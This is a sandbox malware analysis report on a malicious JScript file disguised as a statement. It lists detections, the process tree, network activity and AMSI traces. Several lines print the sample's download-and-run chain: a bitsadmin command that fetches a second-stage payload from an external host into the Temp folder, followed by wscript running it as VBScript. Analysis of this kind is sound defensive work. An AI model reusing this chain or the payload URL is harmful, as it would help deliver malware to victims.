Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New_Statement-8723107.js

Overview

General Information

Sample name:New_Statement-8723107.js
Analysis ID:1524248
MD5:e435fc1fc9a3a3fb5133758ab9ea7e85
SHA1:c59f9c185c510fa8458b1a84594107c77b7a1222
SHA256:9bd5b1deaeb42874154d08cf30c677b22b028a880aaa1e0e51eb7955ba44f162
Tags:jsuser-N3utralZ0ne
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to download files via bitsadmin
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 3328 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • bitsadmin.exe (PID: 6324 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq MD5: 01AAB62D5799F75B0D69EB29C1CA6855)
      • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 3196 cmdline: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • svchost.exe (PID: 5560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ProcessId: 3196, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ParentImage: C:\Windows\System32\bitsadmin.exe, ParentProcessId: 6324, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6240, ProcessName: conhost.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ProcessId: 3196, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ProcessId: 3328, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ProcessId: 3328, ProcessName: wscript.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5560, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 145.14.145.39:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: aeroox.000webhostapp.com
Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: svchost.exe, 00000004.00000002.3507582577.00000207FC8A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wscript.exe, wscript.exe, 00000001.00000003.2586860487.0000020424D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506655448.00000207F72AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506935629.00000207F7B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507582577.00000207FC884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507448837.00000207FC800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110
Source: svchost.exe, 00000004.00000002.3506385344.00000066C71FB000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507840524.00000207FCA50000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2297842973.00000207FC6E1000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://aeroox.000webhostapp.com/dov/0101111001101011010011111111010110111001010111101C:
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110C:
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110ttC:
Source: svchost.exe, 00000004.00000002.3507582577.00000207FC862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeroox.000webhostapp.com:443/dov/010111100110101101001111111101011011100101011110
Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.2235150076.00000207FC6E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownHTTPS traffic detected: 145.14.145.39:443 -> 192.168.2.6:49715 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: New_Statement-8723107.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal72.evad.winJS@7/3@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_03
Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BITE86B.tmpJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjqJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjqJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\6024.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:89 o: f:run a0:%22bitsadmin%20%2Ftransfer%208%20https%3A%2F%2Faeroox.000webhostapp.com%2Fdov%2F010111100110101101001111111101011011100101011110%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvl");IWshShell3.Run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101", "0", "true");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\6024.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:89 o: f:run a0:%22bitsadmin%20%2Ftransfer%208%20https%3A%2F%2Faeroox.000webhostapp.com%2Fdov%2F010111100110101101001111111101011011100101011110%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvl");IWshShell3.Run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101", "0", "true");IWshShell3._00000000();ITextStream.WriteLine(" exit:89 o: f:run r:-2145844824");IWshShell3._00000000();ITextStream.WriteLine(" entry:98 o: f:run a0:%22wscript%20%2F%2FE%3AVBScript%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq%22");IWshShell3.Run("wscript //E:VBScript %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq")

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjqJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3428Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: svchost.exe, 00000004.00000002.3506553730.00000207F722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000004.00000002.3507509647.00000207FC83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507540963.00000207FC855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjqJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjqJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
